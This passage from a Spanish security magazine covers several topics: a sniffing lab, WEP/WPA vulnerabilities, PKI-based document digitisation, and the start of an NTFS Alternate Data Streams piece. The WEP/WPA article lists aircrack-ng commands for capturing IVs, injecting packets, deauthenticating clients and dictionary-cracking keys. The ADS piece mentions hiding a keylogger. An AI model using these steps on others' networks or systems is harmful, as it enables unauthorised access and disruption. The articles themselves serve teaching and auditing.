15). Muestran el inicio de sesión
dado los paquetes Sync, Sync+Ack,
Ack entre el cliente 192.168.100.1 y
el servidor 192.168.100.3. Las líneas:
(Listado 16). Muestran tráfico
de tipo DNS donde se reporta que
el registro inverso no se encuentra
en el dns.
Esto se debe a que el servicio
DNS no esta activado en este servidor
de pruebas.
El resto de líneas muestran el
intercambio de información entre el
servidor y el cliente así como la finalizando
la sesión.
Para los amantes del modo gráfico
(y para casos en que es útil un análisis
más en detalle) el paquete Ethereal
nos será de suma utilidad. Revise el
sitio http://www.ethereal.com/docs/
Vamos a capturar la misma secuencia
de conexión al servidor web
ficticio. Para ello, ejecutaremos Ethereal,
y una vez lo hayamos puesto a
funcionar, ejecutaremos la conexión a
http://192.168.100.3/.
Ejecute el comando en la consola
grafica CTRL-ALT-F7: ethereal &
Para ponerlo a funcionar ir al menú
Capture, Start Capture. Capture datos
por todas las interfaces (any)
Resultado 3.2: Simultáneamente
Inicie un ping a la dirección
192.168.100.2 y la conexión web a la
dirección 192.168.100.3.
Capture la secuencia de tráfico y
analice el establecimiento y la secuencia
de la conexión http, por ejemplo
veamos: (Listado 17)
Análisis del tráfico
Este parrafo de tráfico nos muestra
el ping request y el ping reply entre
el cliente 192.168.100.1 y el servidor
192.168.100.2
Análisis del tráfico
El registro 22:26:49.981941 nos
muestra el cliente192.168.100.1 puerto
32782 enviando un Sync al servidor
192.168.100.3 puerto 80, el sync se
representa por la letra 'S' mayúscula
(Listado 19).
El registro 22:26:49.982318 muestra
los paquetes Sync + Ack enviados
por el servidor 192.168.100.3 puerto
80 hacia el cliente 192.168.100.1 puerto
32782, el synck se representa por la
letra 'S' y el ACK por las letras ack.
Ahora en el registro 22:26:
49.982332 el cliente 192.168.100.1
puerto 32782 envía el paquete ACK
al servidor 192.168.100.3 puerto 80
y con esto se completa la secuencia
de conexión para el servicio web (http)
que presta el servidor al cliente.
El resto del tráfico muestra un ping
entre el cliente y el servidor así como
el envío de la página web desde el
servidor hasta el cliente, además se
ve el fin de la conexión cliente servidor
con la letra 'F'.
En el momento de iniciar la captura,
separe mediante filtrado (opcion
filter dentro del menú capture) ó el
trafico ICMP, guarde el resultado de la
captura HTTP en un archivo y recupérelo
mas tarde para análisis.
Se puede analizar este archivo de
logs de la misma forma que lo haría
con la captura en vivo?
Separe el tráfico ICMP en el archivo
tcpdump.icmp y el trafico http en el
archivo tcpdump.http luego los recupera
por la opción File, Open, Nombre
del archivo.
Y se debe poder analizar de la
misma forma.
Para probarlo tome un registro,
luego la opción TCP y luego Flags,
siempre deberá observar la misma
información.
Que ventajas ve en Ethereal frente
a tcpdump y a la inversa?
En principio debería ver que el
formato en ambos es tcpdump, lo que
permite que ambos comandos vean
52 www.hakin9.org/es
la misma información. La mayoría de
personas prefieren el ethereal por
que es gráfico, parece que al cerebro
le gustan las cosas en modo gráfico
pero es posible que el servidor pierda
el modo gráfico con lo que el modo
carácter de tcpdump es una gran
ventaja.
Obviamente, en este caso hemos
simulando toda la maqueta en una
sola maquina, Aun así que opina de la
seguridad en las redes Ethernet compartidas?
Como aumenta la seguridad
en redes conmutadas?
Las redes compartidas tienen un
solo dominio de colisiones y esto hace
que un sniffer pueda ver todo el tráfico
sin excepciones. Las redes compartidas
son vulnerables frente a sniffing
y se debe haber probado en estos
laboratorios.
Los switchs que permiten las
redes conmutadas mejoran la seguridad,
pues cada puerto del switch
puede ser un dominio de colisiones
independiente.
Ahora es importante recordar que
si la tabla o cache ARP dentro del
switch es inundada con Ips de origen
que no existen el switch se vera obligado
a enviar por medio de broadcast
requerimientos a los otros dominios y
al haber broadcast los sniffers podrán
ver la información.
Repercusiones legales
Trampa (Entrapment):
• Es el proceso realizado por los
cuerpos policiales (law enforcement)
de inducir a alguien
a cometer un acto punible con
el objetivo de iniciar la acción
judicial pertinente.
En este caso del honeypot, aunque
es un elemento pasivo creado
por nosotros para ser atacado (sin
que seamos parte de los cuerpos
policiales) si no deseamos perseguir
judicialmente esta intrusión en
el Honepot, no realizamos ninguna
trampa.
El objetivo del Honeypot es
recibir los ataques, no recoger
información para demandar a los
atacantes del Honeypot. l

Vulnerabilidades
de WEP y WPA
José Luís Picazo Martínez
La comodidad que las redes inalámbricas
han aportado a nuestra vida está fuera
de toda duda, su presencia en organismos
públicos, poblaciones de difícil acceso,
grandes eventos, empresas y sobre todo en
el ámbito doméstico ha facilitado el acceso sin
cables a Internet a millones de personas.
En su concepción teórica las Redes Wifi
tratan de ser tan seguras como lo es una red
cableada, en ayuda de esta concepción nacieron
los sistemas de cifrado WEP y posteriormente
WPA.
WEP, un sueño frustrado
Wired Equivalent Protocol (WEP) fue desarrollado
en 1997 con el objetivo de ofrecer
un grado de privacidad equivalente al que
se tiene en una red con cables. El estándar
IEE 802.11 incorporó desde el principio un
campo en la capa MAC para indicar si se
utiliza cifrado (WEP) o no (Figura 1). Este
estándar ofrecía los siguientes servicios de
seguridad:
• Autenticación: Por clave compartida o Abierta,
que es el estándar 802.11 consistente en
autenticar todas las peticiones que reciben.
54 www.hakin9.org/es
Las redes inalámbricas Wifi, se
han convertido en una necesidad
para los usuarios domésticos.
Su uso masivo ha provocado
que con la misma rapidez con la
que se han intentado proteger,
sus vulnerabilidades hayan
salido a la luz convirtiéndose en
la primera puerta que el hacker
principiante trata de cruzar pero,
¿por qué son tan inseguras?
• Confidencialidad: Mediante la utilización
del algoritmo RC4, WEP se basa en el cifrado
por flujo simétrico de claves. Es decir,
para que el cifrado / descifrado ocurra ambos
extremos deben compartir la clave de
cifrado.
• Integridad: Mediante la inclusión de redundancia
ICV (Integrity Check Value) calculada
con los algoritmos estándar CRC-32 y
cifrada con WEP.
Pues bien, el Listado 1 muestra como romper
este cifrado (Figura 2) en unos pocos pasos.
En este artículo aprenderás
• Los distintos protocolos de cifrado para
redes Wifi.
• Las vulnerabilidades de WEP y WPA.
• Cómo explotar estas vulnerabilidades.
• Cómo dotar a tu red Wifi de Seguridad.
Lo que deberías saber
• Conocimiento básico del protocolo TCP/IP.
• Linux a nivel usuario.

¿Cómo es posible? Si analizamos
el funcionamiento de WEP, este
estándar utiliza el algoritmo RC4,
la operación de cifrado consiste en
la realización del or exclusive de la
corriente de claves con la corriente
de bits. La clave está formada por
la clave simétrica (la misma para
todas las tramas, y la misma usada
en la fase de autenticación) y el
vector de inicialización (variable
para cada trama, pero de 24 bits).
La combinación de clave y vector
(en adelante, IV) logra cifrar cada
trama con una clave distinta a pesar
de emplear una clave simétrica
fija.
IV es transmitido en claro junto
con los datos cifrados para que el
receptor pueda obtener la clave
de cifrado. Si entendemos esto
comenzaremos a ver problemas, si
tengo una parte de la combinación
usada para cifrar en claro y la otra
es fija, es solo cuestión de tiempo
el averiguar la fija.
Además, los IV son de 24
bits, eso nos da como máximo
26.777.216 valores, esto puede
generarse en unas pocas horas
en cualquier red Wifi con un tráfico
moderado y con un buen pack de
herramientas de hacking gíreles
como la suit aircrack-ng o similares
presentes en cualquier distribución
de auditoria.
El Listado 1 muestra todo esto
en 5 sencillos pasos, en 1) y 2) tan
solo escuchamos todo lo que hay
en la red por el interfaz ath0 (podría
ser otro, según nuestro caso),
el 0 indica que recibamos paquetes
de todos los canales (primero hay
que detectar la wifi que nos interesa)
y el 1 que nos quedaremos con
los IV, que al fin y al cabo es lo que
nos interesa, prueba será el archivo
donde todo esto se guarde.
Con estos pasos hemos obtenido
la información de la red
que queremos atacar, apuntamos
el channel y el nombre de la red
(ESSID) y centramos nuestro ataque
en ella comenzando de nuevo
(podemos seguir haciéndolo para
todos los canales y realizar el ataque
sobre prueba, pero si estáis en
Vulnerabilidades de WEP y WPA
una gran ciudad como es mi caso,
no es aconsejable esnifar paquetes
de 15 redes distintas).
En el paso 3) esnifamos paquetes
del canal de la red que nos
Figura 1. Formato de trama IEEE 802.11
Listado 1: WEP roto en 5 pasos
1.-airmon.sh start aht0
2.-airodump ath0 prueba 0 1
3.-iwconfig ath0 mode monitor channel 10 essid GigA
4.-airodump ath0 anita 10 1
5.-aircrack anita*.vis
Listado 2: Acelerando la recolección de IV
www.hakin9.org/es
interesa (en nuestro caso el 10)
indicando como identificador de la
red GigA (esto cambia de una red a
otra). Ahora solo tenemos que sentarnos
y esperar como suben los
1.- aireplay -3 ath0 -b BSSID -h STATION
2.- aireplay -1 30 ath0 -e GigA -a BSSID -h 00:11:22:33:44:55
Listado 3: WAP tampoco es invulnerable
1.- iwconfig ath0 mode monitor channel 11
2.- airodump ath0 anitaWPA 11 0
3.- aireplay -0 5 ath0 –a MAC_PA –c MAC_CLIENTE
4.- aircrack –a 2 –w DiccFileName FileName.cap
Figura 2. El ircrack comienza su trabajo
55

kit
IV. Normalmente son necesarios
250.000 para llegar al paso 5 y obtener
nuestra preciada contraseña,
aunque con suerte no habrá que
esperar tanto (Figura 2). Las redes
más duras de romper nos harán llegar
a los 500.000, pero sigue siendo
cuestión de tiempo.
Acelerando el proceso
¿Cansado de esperar? Bueno incluso
en esto WEP es vulnerable,
es posible acelerar el proceso, el
Listado 2 muestra como hacerlo.
¿Por qué? WEP es vulnerable también
a los ataques de repetición.
Aunque la cabecera de la trama
MAC contiene un campo de nº de
secuencia, no va protegido con la
clave por lo que se puede manipular
fácilmente.
Usando una MAC cualquiera
(como la de 2) y siempre y cuando
el filtrado MAC esté deshabilitado
(sino siempre podremos cambiar
nuestra MAC) podemos inyectar
paquetes a nuestra red, acelerando
el tráfico con, por ejemplo, tramas
antiguas. Si abrimos un nueva consola
en paralelo a la del listado 1,
utilizando 1) inyectaremos paquetes
cuando hay más clientes conectados,
en 2) lo hacemos cuando
estemos nosotros solos, de ahí que
pongamos una MAC aleatoria.
WPA, ¿Solución
o más de lo mismo?
Wifi Protected Area es la evolución
ante la decepción que supuso WEP.
Entre los requisitos que se exigían
al nuevo mecanismo de cifrado
estaba el que el hardware de WEP
fuera válido para WPA. Por lo que
los algoritmos son muy parecidos,
WPA también usa RC4 y vectores
de inicialización, pero con sutiles
diferencias:
• Cifrado: Basado en TKIP (Temporal
Key Integrity Protocol), que
consiste en la generación de una
clave WEP dinámica diferente
por cada trama transmitida por
cada cliente asociado al punto de
acceso (PA).
• Integridad de datos: Se sustituye
el IVC (recordemos Figura 1)
por el Message Integrity Check
(MIC). El MIC está basado en
un algoritmo de Hash unidireccional
que no es susceptible a
ataques Bit-Flipping como si lo
es CRC-32
• Autenticación: Provee el esquema
de autenticación mutua IEEE
802.1x / Extensible Authentication
Protocol (EAP) o clave precompartida
(PSK), más común
en el ámbito doméstico.
En principio parece que hemos solucionado
los problemas de WEP, tenemos
un nuevo método de cálculo
de la secuencia de integridad en la
trama.
Evitamos los ataques de repetición
y añadimos una nueva función
que refresca las claves de cifrado y
Figura 3. Usario íctima de nuestro
ataque 0 Figura 4. Auditor CD de remote-exploit
56 www.hakin9.org/es
autenticación para combinar las claves,
cifrando cada trama con claves
diferentes.
Pues bien, el Listado 3 rompe
WAP-PSK en 4 pasos. WPA-PSK
usa una clave de acceso de una
longitud entre 8 y 63 caracteres, que
es la clave compartida. Al igual que
ocurría con WEP, esta clave hay que
introducirla en cada una de las estaciones
y puntos de acceso de la red
inalámbrica. Cualquier estación que
se identifique con esta contraseña,
tiene acceso a la red.
La principal debilidad de WPA-
PSK es la clave compartida entre
estaciones. Cuando un sistema
basa su seguridad en un contraseña
siempre es susceptible de sufrir un
ataque de fuera bruta, es decir ir
comprobando contraseñas, aunque
dada la longitud de la contraseña y si
está bien elegida no debería plantear
mayores problemas.
Pero si nos fijamos bien en el funcionamiento
de WAP, hay un momento
de debilidad cuando la estación
establece el diálogo de autenticación.
Este diálogo va cifrado con las claves
compartidas, y si se entienden entonces
se garantiza el acceso y se inicia
el uso de claves dinámicas.
La debilidad consiste en que
conocemos el contenido del paquete
de autenticación y conocemos su

valor cifrado. Ahora lo que queda es,
mediante un proceso de ataque de
diccionario o de fuerza bruta, intentar
determinar la contraseña.
Las líneas 1-3 del Listado 3 hacen
precisamente eso, aprovechar el momento
de debilidad, nos quedamos
Vulnerabilidades de WEP y WPA
preparados para escuchar todo lo que
pase por nuestra red (1 y 2), en ese
momento realizamos un ataque tipo 0
para desautenticar a uno de sus usuarios,
este se desconecta, se vuelve a
conectar y capturamos el handshake.
Ya tenemos todo lo necesario, con
Sobre el Autor
José Luís Picazo es Ingeniero Técnico en Informática de Sistemas e Ingeniero Informático.
Ya desde la Universidad enfocó su carrera hacia el mundo de la Seguridad y
la Auditoría, realizando para ello el PFC en Test de Intrusión. Actualmente finaliza el
Master en Seguridad de la Información de la Universidad Politécnica de Madrid y el
PFM en Análisis Forense y Peritaje Informático.
Actualmente lleva a cabo su carrera profesional en AXPE Consulting y colabora en
diversos proyectos de Metodología Forense.
Referencias
• Aplicación de apoyo al hacking wíreless
http://www.kismetwireless.net/
• Artículo WEP
http://es.wikipedia.org/wiki/Wired_Equivalent_Privacy
• Artículo WPA
http://es.wikipedia.org/wiki/Wi-Fi_Protected_Access
• AUDITOR CD
http://www.remote-exploit.org/
• Definición del estándar wireless
http://es.wikipedia.org/wiki/IEEE_802.11
• Knoppix Live CD
http://www.knoppix.org/
• Manual hacking wireless
http://www.elhacker.net/manual_hacking_wireless.htm
Figura 5. Aplicación para atacar WPA-PSK
www.hakin9.org/es
nuestro handshake en un fichero ya
podemos realizar ataques por fuerza
bruta durante el tiempo que queramos.
Aquí viene el pero, necesitaremos
de un buen diccionario (fichero
de texto plano con palabras) para ello,
sino es posible que estéis durante 36
horas (como yo) atacando sin obtener
resultados. Ahora bien, no todo iba a
ser fácil, existen numerosos diccionarios
disponibles en la red, solo es
necesario bajar uno en nuestro propio
lenguaje que incluso podremos ir ampliando
según recopilemos palabras.
Conclusiones
A día de hoy las redes inalámbricas no
son infalibles, comparadas con las cableadas
son mucho más susceptibles
de ataques de denegación de servicio,
un ataque 0, irradiación de ondas para
limitar o distorsionar la señal es posible
sin muchos conocimientos técnicos.
Por tanto una corporación no
puede depender de estos servicios
por muy bien que quede de cara a
un cliente en la presentación de un
proyecto. Las redes wifi en el ámbito
profesional deben ser un apoyo,
nunca debe existir dependencia sino
veremos como nuestros servicios se
caen una y otra vez.
En el ámbito doméstico, un cifrado
WPA con una buena clave, unido a algunos
de los consejos que los lectores
de hakin9 pudimos ver en el artículo
de Eduardo Tabacman (nº 30 de la
revista) nos permitirá disfrutar de una
Wifi lo suficientemente segura para
que no nos quiten el sueño (aunque
conviene recordar que la seguridad
100% no existe, toda medida tiene su
contramedida).
En cuanto a las herramientas utilizadas,
estas vienen disponibles en
cualquier distribución LiveCd del mercado,
Troppix, Knoppix o el AUDITOR
CD (Figura 4) que es mi preferido.
Otras herramientas de las que
no he hablado, y que serán un buen
apoyo ante ESSID ocultos, redes de
las que se desconoce su estándar de
cifrado etc. es Kismet, también sencilla
de usar, aunque la mayor parte
de los casos, no nos será necesaria.
Espero que hayan disfrutado de este
artículo, Feliz Conexión. l
57

Digitalización
Roger Carhuatocto
Identificar la importancia de la Criptografía
de Clave Pública en Aplicaciones
de Digitalización de documentos en las
Empresas.
Conocer la regulación Española sobre la
Digitalización de Documentos, los requerimientos
legales y de seguridad que deben
cumplir las Aplicaciones de Digitalización.
Mucha gente se pregunta si hay negocio
alrededor de la PKI, aunque hemos visto
cerrar algunas empresas otras cambiar su
modelo de negocio, en fin, aquí veremos
que hay aplicaciones reales a la PKI y posiblemente
más negocio alrededor de la
PKI. Antes hay que preguntarnos cuál es el
rol que juega la PKI en las aplicaciones de
negocio actualmente?, y la respuesta es que
la PKI es un requisito, es una infraestructura
básica. Igual que para desarrollar en JAVA
antes hay que tener una JVM.
Desde mi punto de vista, PKI se ha convertido
en una comodity y para construir
aplicaciones de negocio seguras las Organizaciones
deben desplegar una PKI, aquí la
PKI es un requisito no el objetivo. Este es el
gran error cometido en los anteriores años y
por ello el cambio de modelo de negocio en
58 www.hakin9.org/es
El artículo explica cómo diseñar
y construir una aplicación que
convierta documentos en papel
a formato digital con la garantía
de que los documentos digitales
sean copia fiel a los de papel y
que cumplan los requerimientos
que exige la Regulación sobre
Administración Electrónica. Para
ello usamos aplicaciones Open
Source y Criptografía de Clave
Pública.
algunas Empresas del Sector. El negocio
está en los servicios (gestión, formación,
desarrollo de aplicaciones, etc.) que se
pueden desarrollar alrededor de la PKI, por
ejemplo, el desarrollo e integración de aplicaciones
de negocio con un uso intensivo de
certificados y criptografía. Entonces, explicaremos
cómo construir una aplicación de
negocio (digitalización de documentos certificada)
basada en criptografía, certificados
digitales y componentes Open Source.
En este artículo aprenderás
• Diseñar aplicaciones que usen Certificados
X.509 y Firma Digital.
• Certificación de procesos electrónicos como la
digitalización.
• Cómo garantizar la integridad de documentos
digitalizados.
Lo que deberías saber
• Estándar X.509, XAdES, JAVA, TWAIN, SANE,
etc.

Figura 1. Ciclo de vida de la digitalización de documentos
Digitalización
Certificada
La digitalización es el proceso
por el cual documentos en papel
son convertidos a su equivalente
digital, necesario para continuar
el trámite via las aplicaciones de
negocio. Cuando hablamos de digitalización
certificada nos referimos
que se garantiza la integridad
y la seguridad en general a todo
el proceso de digitalización así
como el objeto digitalizado y su
fiel correspondencia al documento
en papel.
Diseño de una Aplicación de
Digitalización Certificada Como
todas las Aplicaciones de Digitalización,
éstas deben implemetar
funcionalidades para cada etapa
del ciclo de vida de la digitalización
de documentos. Ciclo
de vida de la Digitalización de
documentosSegún AIIM iAIIM
- www.aiim.org.uk Input/Capture:
1 2
Digitalización de Documentos Certificada
etapa inicial por el cual se aquiere
los documentos en papel y los
datos. El documento en papel será
capturado y pasará a ser una imagen,
mientras que información textual
del mismo documento tendrá
que ser tratado de forma diferente
si se desea introducir al sistema.
Existen diferentes métodos de
input/capture, el más usado es el
escaneo de imágenes o simplemente,
importándo las imágenes
desde otro repositorio.
Conversion: después del escaneo
obtendremos un imagen en
un formato determinado, en esta
etapa convertiremos un formato
inicial a otro final. Recordar que es
posible adquirir imágenes de otros
dispositivos como cámaras de fotografía,
fax, etc., en este caso la
conversión de formato es vital.
Recognition: es la etapa por la
cual se identifica y se reconoce
de información sensible y repre-
3 4 5 6
INPUT/CAPTURE CONVERSION RECOGNITION UALITY CONTROL INDEXING OUTPUT
Authenticity, Itnegrity
and non-repuditation
Figura 2. Autenticidad, integridad y no repudio en la digitalización de
documentos. Técnicas Criptográficas usadas: Firma digital y validación
www.hakin9.org/es
sentativa como patrones de texto,
patrones de imágenes, dibujos
o marcas, etc. Algunas técnicas
utilizadas son el OCR, ICR, OMR,
Barcode recognition, etc.
Quality control: nos permite
realizar actividades de control sobre
las actividades anteriores, es
decir, si durante el proceso de escaneo
de un documento la imagen
resultante tiene mucha distorción y
no tiene parecido al documento en
papel, entonces es necesario alguna
rectificación manual u pseudo-automática.
Indexing: etapa
donde se utilizará la información
textual reconocida para asociarla
a la imagen digital (representación
del documento en papel) para su
rápida y exacta recuperación del
documento, en su versión digital.
Output: todo documento en
papel o digital necesita un lugar
para almacenamiento, en muchos
casos el lugar depende del formato
de salida del documento. Por
ejemplo, prefiero guardar en mi
repositorio documentos digitales
representados en formato XML,
pero no documentos en formato
PDF. Requisitos de Seguridad:
Autenticidad, integridad y no repudio.
Qué de especial tiene una aplicación
que digitalice documentos,
esto ya lo puede hacer cualquier
59

kit
Digital Signature
Services Platform
•Create Digital Signature
•Validate digital certificate
•Encryption of digital information
scanner o impresora multifuncional.
Sin embargo, estos aparatos
no disponen de funcionalidades
que garanticen la integridad, ni la
autenticidad del objeto escaneado,
ni la seguridad en todo el proceso
Ul Scanning
Component
TWAIN & SANE
Adaptors
Put, Get & Search
e-Doc Adaptor
Cert. Validation
Connector
Figura 3. Propuesta de arquitectura de una Aplicación de Digitalización Certificada
Figura 4. Firma Digital de documentos en OpenOffice
Capture Module
Configuration
ECM Module
Indexing
de digitalización. Imaginemos que
la Cia. ABC desea transformar las
facturas en papel a formato digital
para luego usarlas en sus sistemas
internos de gestión, cumplir
la leyes respecto a la preserva-
60 www.hakin9.org/es
E-Doc
Viewer
Digitalization
Policy Manager
Quality Control Module
Audit & Trail
Manager
Crypto Party Module Recognition Module
Encryption
Connector
DigSign. Factory
Connector
OCR
Component
Bar Code
Component
Conversion
Component
DigSign.
Component
ción de las facturas en papel por
un determinado tiempo y evitar
gastos innecesarios de mantenimiento
de las facturas en papel,
gastos como: almacenamiento,
copias en papel, mantenimiento
del papel, etc.
Para que la Cia. ABC pueda
lograr esto es necesario tener una
solución de digitalización de facturas
que garantice:
La autenticidad: que el documento
digitalizado sea copia fiel
del documento en papel y que no
existan dudas de que haya manipulado
nada durante el proceso de
digitalización.
La integridad: que el documento
digital tenga mecanismos para
determinar si este fue modificado
o no. No repudio: que nadie pueda
negar que el documento digital no
representa al documento en papel
y éste pueda ser admitido en los
procesos de negocio.
Entonces, el uso de técnicas
criptográficas y certificado digital
en esta situación concreta es de
vital importancia.
Durante la digitalización, para
garantizar que el documento papel
ha sido escaneado correctamente
sin intervención de elementos distorsionadores
externos y por con-

siguiente se tiene un documento
digital se utiliza la firma digital.
Durante el proceso de creación de
la firma digital se realiza un proceso
de validación contra proveedores
de confianza (Autoridades de
Validación) que nos indica que las
credenciales (certificado digital)
usados durante la firma son completamente
válidas.
Existen diferentes formatos de
firma digital, desde formatos clásicos
como PKCS7 y CMS/CAdES,
hasta formatos más avanzados
como XMLDsig y XAdES. Se recomienda
XAdES como estándar
para requerimientos de seguridad
avanzada como archivado de evidencia
digital, validez de la firma
cuando el certificado digital ha
caducado, etc.
Técnicas de Digitalización
Existen tres técnicas/estándares
para implementar soluciones que interactuen
con dispositivos scanners,
ellos son:
• TWAINiiTWAIN - www.twain.org
• SANE - www.sane-project.org
• WIA - www.microsoft.com
Yo particularmente prefiero SA-
NE ya que permite escarlar la
aplicación fácilmente y añadir
funcionalidades de una manera
modular, además de la abundancia
de aplicaciones maduras Open
Source que siguen estas especificaciones.
Listado 1. Aplicaciones Open Source base
OpenOffice (http://www.openoffice.org)
gscan2PDF (http://gscan2pdf.sourceforge.net)
ImageJ (http://rsb.info.nih.gov/ij)
Jsane-net (http://www.sourceforge.net/projects/jsane-net)
GIMP (http://www.gimp.org)
XSANE an graphical scanning frontend (http://www.xsane.org)
Listado 2. Aplicaciones y APIs no Open Source
para digitalización
Morena (http://www.gnome.sk)
JSANE an Java SANE implementation
(http://www.asprise.com/product/jsane)
Una aplicación de digialización
por lo general será una aplicación
stand-alone y no cliente-servidor.
Esto tiene mucho sentido, una
aplicación de digitalización estará
instalada en una computadora del
operario (digitalizador certificado)
que tenga conectada un dispositivo
scanner, dicho operario tendrá
capacidad de interactuar con los
certificados digitales y clave privada,
y con el respectivo conector
a los servicios de validación de
dichos certificados.
Como el escaner y el certificado
digital están en la misma
computadora que usará el operario,
además dicho operario tendrá
alimentar con documentos en papel
al escaner, por ello, no tendrá
mucho sentido que la aplicación
sea construída siguiendo el patrón
cliente-servidor. Sin embargo, SA-
NE permite construir aplicaciones
que realizan la tarea de digitalización
de forma remota si esto es
necesario.
Arquitectura
propuesta
Está claro que el desarrollo de
la solución está relacionado a la
naturaleza de los requerimientos
y entorno de usuario. Por el
momento será, stand-alone, con
SANE, uso de certificados digitales
en cliente, formato de la firma
XAdES y Open Source (Ver Figura
3). Destacamos la inclusión de
módulos orientados a cada una de
www.hakin9.org/es
61

kit
las etapas del ciclo de vida de la
digitalización.
Además, incluímos un módulo
capáz de realizar funcionalidades
para garantizar la autenticidad, integridad
y no repudio del proceso de
digitalización y de los documentos
digitalizados.
Aplicaciones
propuestas
para Digitalización
Certificada
Basándonos en diferentes iniciativas
Open Source relacionadas a la
digitalización de documentos hemos
podido hacer una revisión rápida de
dichas soluciones, en todos los casos
son una revisión bastante escueta y
sólo perseguimos elaborar prototipos.
Esto no quiere decir que ninguna
de estas opciones no sean válidas
para ser usadas en entornos productivos
reales, todo lo contrario,
si deseamos darle la capacidad de
digitalizar lotes de documentos en
papel, estos propotipos son la base
para construir soluciones de mayor
alcance.
Figura 4. Escaneando documentos desde OpenOffice
Aplicaciones Open
Source base a usar
Las aplicaciones base Open
Source que podemos usar están
monstradas en Listado 1. Existen
otras aplicaciones y/o APIs que
nos permiten desarrollar aplicaciones
desde del scratch y que son
bastante usadas, pero en nuestra
propuesta únicamente las mencionamos
(Listado 2).
Conclusiones
La única aplicación Open Source
con capacidades de escaneo y
con capacidades de firma digital
es la suite OpenOffice.
El resto de opciones son herramientas
para el escaneo o bien para
el tratamiento de imágenes, en
cualquier caso, es fácil incorporar
funcionalidades de firma digital y
validación.
Las funcionalidades de reconocimiento
de caracteres viene incluído
como plug-in en muchas de las herramientas
de escaneo como XSA-
NE, gscan2PDF, etc. De cualquier
forma, también es una funcionalidad
62 www.hakin9.org/es
Sobre el Autor
Roger Carhuatocto es un Ingeniero
de Sistemas de Perú, especializado
en Seguridad.
Ha trabajado en Organizaciones
Españolas de Tecnología de Seguridad,
Integradoras y especializadas
en Open Source, además de frecuente
Expositor en temas de Seguridad
en España, Perú, Venezuela y
Argentina.
Actualmente se desempeña
como IT Security Consultant en
Hewlett-Packard Española. Roger
es un entusiasta de la Seguridad
desde la perspectiva de Negocio y
Tecnología, tiene una visión Holistica
de la Seguridad, ha establecido
relación entre QA y Seguridad.
Actualmente trabaja en la relación
entre Seguridad-Confianza
con la Usabilidad y Accesabilidad,
además de la influencia con temas
de Human-computer Interaction
(HCI), User Experience (UX) y Web
2.0.
Podéis contactar con él en: http:
//www.linkedin.com/in/rcarhuatocto
fácil de integrar sobre soluciones que no tienen dicha funcionalidad. En cada
país existe regulación específica
que aborda temas de digitalización
de documentos en papel, entrada o
registro de documentos, etc., regulación
que indica que los documentos
digitales, resultado de un proceso
de digitalización tiene total validez
como si se tratase del papel.
El uso de certificados digitales
permite el cumpliento de requerimientos
especiales de esta
regulación. Un problema común
cuando se digitaliza documentos
es la rapidez en la adquisición via el
escaneo. Lo conveniente, siempre y
cuando se digitalice lotes grandes
de documentos que siguen algún
patrón estructural, es usar una cámara
digital en lugar del scanner.
La velocidad de adquisición de una
cámara fotográfica es muy superior
al scanner. En esta situación la interfase
de comunicación con el dispositivo
no usará SANE ni TWAIN,
usará el que defina el fabricante de
la cámara. Hablaremos de este estándar
en otro artículo. l

Doctor Jekyll y Mr.
Hyde versión NTFS
Laic Aurelian
La característica principal de esta funcionalidad
es la invisibilidad. Cuando
leemos el contenido de un fichero, accedemos
únicamente al stream principal de ese
fichero. Cualquier otro stream asociada a un
fichero es invisible a la mayoría de las utilidades
de gestión de archivos como Windows Explorer
o el comando Dir de MS-DOS. Muchos
especialistas han mostrado sus quejas por esta
funcionalidad porque un virus puede explotarla
y, sin embargo, muy poca gente la utiliza en su
beneficio.NTFS apoya las secuencias de datos
múltiples, donde el nombre de la corriente
identifica una nueva cualidad de los datos en
el archivo. Una manija se puede abrir en cada
secuencia de datos. Una secuencia de datos,
entonces, es un sistema único de cualidades
del archivo. Las corrientes tienen cerraduras
opportunistic separadas, cerraduras del archivo,
y tamaños, pero permisos comunes.Los
usuarios malévolos se aprovechan de secuencias
de datos de NTFS almacenando un virus
o un Trojan en tu sistema. Los empleados
pueden abusar de esto ocultando gráficos o
datos detrás de archivos de texto, del etc. Uso
de ADS permite al usuario entre otros: visualizar
el contenido del stream como texto en un
64 www.hakin9.org/es
Este artículo trata sobre
Alternate Data Streams.
Comparándola con la
estaganografía clásica, esta
técnica oculta documentos
asociándolos como un stream
en otro documento. La principal
ventaja es que el documento es
completamente invisible pero
lo asociado como un stream en
otro documento sólo puede ser
transferido a otra unidad NTFS.
cuadro de texto o usando una utilidad de texto
(Wordpad para Windows), extraer el contenido
de un stream y abrirlo usando un programa
asociado, borrar un stream o todos los streams
asociados a un fichero, inyectar un fichero como
ADS en otro fichero y más.
Basta de teoría, practiquemos
En los próximos ejemplos, usaremos algunos
scripts de MS-DOS y Visual Basic. Antes que
nada, una aclaración: el nombre ADS incluye
En este articulo aprenderás
• Cómo usar ADS y ocultar algunos documentos
importantes, passwords.
• Cómo asociar un programa de monitorización
por ejemplo: un key-logger.
Lo que deberías saber
• Cómo utilizar métodos como Vb scripts, batch
scripts o Notepad o lenguajes de programación
avanzados como C#, C++ o VB.
• Cómo usar característica de NTFS honestamente
explotando la invisibilidad de ADS.

el nombre del fichero original, el
carácter “:” y el nombre ADS. Por
ejemplo:
C:\Test\FileName.txt:StreamName.txt
Donde FileName.txt es la cadena principal
y StreamName.txt es el ADS.
• Para todos los ejemplos futuros
usaremos una nueva carpeta
donde guardaremos todos los
fichero y scripts. En mis ejemplos
usaré la carpeta c:\TestADS. Para
probar estos ejemplos, crearos
una carpeta nueva y practicad con
ella. Si le habéis dado un nombre
diferente, sustituidlo con el nombre
de la vuestra.
• En el primer ejemplo os mostraré
cómo crear un stream usando Notepad
y el comando ejecutar:
Click Inicio, y luego click Ejecutar.En
Abrir, escribiremos el siguiente comando:
Notepad.exe C:\TestADS\
FileName.txt:StreamName.txt
Nos aparecerá un cuadro de mensaje
preguntándonos si queremos crear un
nuevo fichero. Pulsamos Sí y voila,
habéis creado vuestro primer ADS.
Escribid algún texto en el documento
y cerradlo. Confirmad que queréis salvar
los cambios. Ahora, con Windows
Explorer, abrid el fichero C:\TestADS\
NombreFichero.txt daos cuenta de que
el tamaño del fichero es de 0 bytes.
Observaréis un fichero en blanco. Para
editar el ADS debéis abrirlo usando
también el comando Ejecutar. Si usáis
el comando Abrir del Notepad y ponéis
la dirección:
C:\TestADS\Filename.txt:StreamName.txt
os saldrá un mensaje de error. Por tanto,
pulsad Inicio y después Ejecutar.
La ventana os mostrará los elementos
recientes. Escribid
C:\TestADS\Filename.txt:StreamName.txt
en el cuadro de diálogo o seleccionadlo
de la lista y pulsad OK para
abrirlo. Escribid algún texto, guardad
el documento y cerradlo. El fichero C:
